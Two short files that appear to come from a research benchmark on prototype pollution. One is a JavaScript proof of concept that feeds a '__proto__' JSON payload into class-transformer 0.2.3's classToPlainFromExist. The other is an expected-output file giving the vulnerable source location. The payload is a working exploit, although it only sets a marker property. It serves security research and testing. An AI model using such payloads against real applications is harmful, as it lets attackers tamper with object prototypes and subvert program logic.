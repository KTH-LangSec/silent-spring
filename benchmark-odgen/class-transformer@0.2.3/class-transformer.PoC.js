const root = require("./class-transformer@0.2.3");
const payload = JSON.parse('{"__proto__": {"polluted": "yes"}}');

root.classToPlainFromExist(payload, {});
