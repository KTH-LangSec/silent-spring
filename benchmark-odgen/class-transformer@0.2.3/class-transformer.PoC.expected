class-transformer@0.2.3/TransformOperationExecutor.js:242:25:242:32